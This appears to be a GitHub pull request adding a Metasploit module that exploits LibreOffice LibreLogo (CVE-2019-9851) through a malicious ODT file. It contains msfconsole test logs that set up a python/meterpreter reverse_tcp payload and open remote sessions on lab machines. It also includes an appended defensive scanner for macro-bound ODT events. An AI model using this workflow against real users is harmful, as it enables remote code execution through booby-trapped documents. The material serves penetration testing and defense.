
Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9851) #12207

Merged
merged 22 commits into from
Aug 19, 2019

Conversation

LoadLow
Contributor

@LoadLow LoadLow commented Aug 16, 2019

Follows #12147

Resolves #12103

Exploit written 17 days ago, before CVE-2019-9851 was publicly announced/disclosed.

@LoadLow LoadLow changed the title Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9851) Aug 16, 2019
This new CVE explains this exploit (global events are used)
@space-r7
Contributor

Is there a reason to use ARCH_CMD payloads rather than ARCH_PYTHON?

I ask, because this is a file format exploit, and there's no guarantee the user will open the
document on the correct platform. Comparatively, if you're already executing native Python
code, you could use a Python payload, which should effectively be universal, and execute
regardless of the target platform.

Hi, @LoadLow! I made a PR on your branch that includes changes so your module can use Python payloads. The module works for both Windows and Linux, but an error window now pops up once your Meterpreter session is closed. There might be a specific setting for the python/meterpreter/reverse_tcp payload that could fix it, but I didn't look too deeply into that. Please let me know if those changes work for you!

Use Python instead of platform-dependent code
- Changes target to Automatic
- Set default options instead of default target for options
- Adds links for the two vulnerabilities exploited by this module
- Removes unnecessary double encoding+eval
@LoadLow
Contributor Author

LoadLow commented Aug 18, 2019

Hi @space-r7!
It works like a charm, thank you!

I have changed some options and it should now work without this error popup.

@bcoles
Contributor

bcoles commented Aug 18, 2019

Tested automatic targeting with Python payload on Linux Mint 19 using the latest commit at the time (Adds default options). I didn't encounter any popups.

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set wfsdelay 600
wfsdelay => 600
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set disablepayloadhandler false
disablepayloadhandler => false
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /root/.msf4/local/librefile.odt
[*] Sending stage (53755 bytes) to 172.16.191.211
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.211:44392) at 2019-08-18 09:16:16 -0400

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer        : linux-mint-19-2
OS              : Linux 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018
Architecture    : x64
System Language : en_AU
Meterpreter     : python/linux
meterpreter > 

I performed a little experimentation, but nothing thorough. I noticed that exploitation seemed to be a little unreliable. However, this was likely due to alt-tabbing out of the test VM during exploitation, preventing the mousemove event from firing. This is unlikely to be an issue in practice.

There's also the issue of leaving lingering soffice.bin processes, even after both LibreOffice and the shell session have been closed. There's probably not a lot that can be done to prevent this.

$ ps aux | grep libre
user      8321  0.0  0.0 1343484  864 ?        Ss   23:26   0:00 /usr/lib/libreoffice/program/soffice.bin --writer file:///home/user/Desktop/asdf.odt --splash-pipe=5
user      8370  0.0  2.7 1344052 27504 ?       Ss   23:27   0:00 /usr/lib/libreoffice/program/soffice.bin --writer file:///home/user/Desktop/asdf.odt --splash-pipe=5
user      8419  0.0 13.0 1346600 131976 ?      Ss   23:27   0:00 /usr/lib/libreoffice/program/soffice.bin --writer file:///home/user/Desktop/asdf.odt --splash-pipe=5
user      8434  0.0  0.1  14428  1024 pts/4    S+   23:29   0:00 grep --color=auto libre

Out of ~20 exploitation attempts, I encountered one system freeze, rendering X unresponsive, which required switching to TTY1 to kill off the soffice.bin processes. This happened only once, and was probably due to my test environment and behavior (i.e., switching between VMs, multiple dangling processes from multiple exploitation attempts, exploitation attempts without a suitable listener, multiple exploitation attempts using the same file name, which had since been overwritten/deleted, etc.).

Edit: Also, apparently my system ran out of memory which probably wouldn't have helped.

52962.018240] Out of memory: Kill process 7340 (soffice.bin) score 65 or sacrifice child
[352962.018263] Killed process 7340 (soffice.bin) total-vm:1344520kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[352965.699717] audit: type=1400 audit(1566134656.330:1603): apparmor="ALLOWED" operation="exec" profile="libreoffice-soffice" name="/bin/uname" pid=8016 comm="sh" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0 target="libreoffice-soffice//null-/bin/uname"

@LoadLow
Contributor Author

LoadLow commented Aug 18, 2019

Thank you for the feedback!

It seems it is heavier than when we were executing a subprocess with the payload exec by calling os.system.
Also, the session is closed when the document is closed (PrependMigrate ignored?).
But whatever, it is working.

Metadata part is not mandatory on ODT files
Prevents autosave and further modifications after opening the document on the target system.
@space-r7
Contributor

Also, the session is closed when the document is closed (PrependMigrate ignored?).

PrependMigrate is specific to Windows payloads, so it is being ignored in this case. (I forgot to remove it.) @bcoles, do you have any more improvements in mind? I can remove the PrependMigrate option before landing.

@bcoles
Contributor

bcoles commented Aug 19, 2019

Also, the session is closed when the document is closed (PrependMigrate ignored?).

PrependMigrate is specific to Windows payloads, so it is being ignored in this case. (I forgot to remove it.) @bcoles, do you have any more improvements in mind? I can remove the PrependMigrate option before landing.

Without looking into it, or testing the changes since Adds default options commit, I don't have any specific improvements in mind.

For what it's worth, the session doesn't die when I close the document - not sure if that behavior was introduced in the newer commits?

@space-r7
Contributor

For what it's worth, the session doesn't die when I close the document - not sure if that behavior was introduced in the newer commits?

Just tested the latest commits on both Windows and Linux. The session dies upon closing LibreOffice on Windows, but stays alive when the file is closed on Linux. It looks like the MeterpreterTryToFork option functionality that's set to true by default won't work on Windows currently, so it looks like we lost that after changing to Python payloads.

@bcoles
Contributor

bcoles commented Aug 19, 2019

it looks like we lost that after changing to Python payloads.

Welp. The original targets could be added back in, leaving python as the default. But I'm happy with the module as is.

@space-r7
Contributor

Welp. The original targets could be added back in, leaving python as the default. But I'm happy with the module as is.

Will keep the single Python target as exploitation is much more likely if the target is unknown. Will see if there is any potential for extending the MeterpreterTryToFork to Windows. Thanks, @bcoles!

@space-r7
Contributor

Tested on Windows and Linux with the latest changes:

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > handler -H 192.168.37.1 -P 4444 -p python/meterpreter/reverse_tcp
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.37.1:4444 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > [*] Sending stage (53755 bytes) to 192.168.37.143
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.143:60316) at 2019-08-19 13:09:59 -0500
[*] Sending stage (53755 bytes) to 192.168.37.147
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:49690) at 2019-08-19 13:10:15 -0500

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > sessions

Active sessions
===============

  Id  Name  Type                        Information                                    Connection
  --  ----  ----                        -----------                                    ----------
  1         meterpreter python/linux    space @ ubuntu                                 192.168.37.1:4444 -> 192.168.37.143:60316 (192.168.37.143)
  2         meterpreter python/windows  DESKTOP-L5FDSM7\Shelby Pace @ DESKTOP-L5FDSM7  192.168.37.1:4444 -> 192.168.37.147:49690 (192.168.37.147)

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.143 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-L5FDSM7
OS              : Windows 10 (Build 16299)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows

@space-r7 space-r7 merged commit dc07b78 into rapid7:master Aug 19, 2019
@LoadLow LoadLow deleted the libreoffice_librelogo_exec branch August 19, 2019 18:26
@space-r7
Contributor

space-r7 commented Aug 19, 2019

Release Notes

The LibreOffice LibreLogo Exec module has been added to the framework. It exploits a vulnerability in LibreLogo when bundled with LibreOffice. This module generates an ODT file with a global DOM loaded event that, when triggered, will execute any arbitrary Python code.

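The release note above describes the mechanism from the attacker's side: an ODT whose global document-load event is bound to a Python script. The following is an added example, not part of this PR or of the Metasploit module, showing the defender's counterpart: it opens an ODT container (a zip archive), parses its XML parts, and reports every script:event-listener whose target uses the vnd.sun.star.script: URL scheme, singling out bindings that dispatch to Python. The sample document is constructed inline; the script path Example.Module$run is a placeholder, and dom:load is assumed to be the event name LibreOffice writes for the document-open event.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OpenDocument namespaces that carry script event bindings.
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "script": "urn:oasis:names:tc:opendocument:xmlns:script:1.0",
    "text": "urn:oasis:names:tc:opendocument:xmlns:text:1.0",
    "xlink": "http://www.w3.org/1999/xlink",
}


def find_script_event_listeners(odt_bytes):
    """Return (part_name, event_name, href) for every script:event-listener
    element in the XML parts of an ODT container (META-INF is skipped)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".xml") or name.startswith("META-INF/"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed part is not a listener; report separately if desired
            for el in root.iter("{%s}event-listener" % NS["script"]):
                event = el.get("{%s}event-name" % NS["script"], "")
                href = el.get("{%s}href" % NS["xlink"], "")
                findings.append((name, event, href))
    return findings


def classify_href(href):
    """Classify a listener target: 'script-python' for a Python macro call via
    vnd.sun.star.script:, 'script-other' for any other macro call, else 'ok'."""
    h = href.lower()
    if not h.startswith("vnd.sun.star.script:"):
        return "ok"
    return "script-python" if "language=python" in h else "script-other"


def scan_odt(odt_bytes):
    """Return human-readable alerts for every macro-bound event in the document."""
    alerts = []
    for part, event, href in find_script_event_listeners(odt_bytes):
        level = classify_href(href)
        if level != "ok":
            alerts.append("%s: event %r bound to %s target %r" % (part, event, level, href))
    return alerts


def build_sample_odt(event_listener_xml):
    """Construct a minimal ODT in memory (constructed test data, not a real document)."""
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<office:document-content xmlns:office="{office}" xmlns:script="{script}" '
        'xmlns:text="{text}" xmlns:xlink="{xlink}">'
        '<office:scripts><office:event-listeners>{listeners}</office:event-listeners></office:scripts>'
        '<office:body><office:text><text:p>hello</text:p></office:text></office:body>'
        '</office:document-content>'
    ).format(listeners=event_listener_xml, **NS)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content)
    return buf.getvalue()


# Constructed listener: placeholder script path, bound to the document-open event.
SUSPECT_LISTENER = (
    '<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
    'xlink:href="vnd.sun.star.script:Example.Module$run?language=Python&amp;location=share"/>'
)

if __name__ == "__main__":
    for label, listeners in (("clean", ""), ("suspect", SUSPECT_LISTENER)):
        print(label, scan_odt(build_sample_odt(listeners)))
```

xml.etree is used here because the sample is trusted; when scanning documents from untrusted sources, swap in defusedxml or otherwise disable entity expansion, since the XML parser is itself attack surface. The check keys on the vnd.sun.star.script: scheme rather than on any particular library name, so it also catches bindings to other bundled or document-local macros, which is why the output distinguishes Python targets from the rest.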
@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 5, 2019
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Development

Successfully merging this pull request may close these issues.

LibreOffice - LibreLogo arbitrary script execution (CVE-2019-9848)
4 participants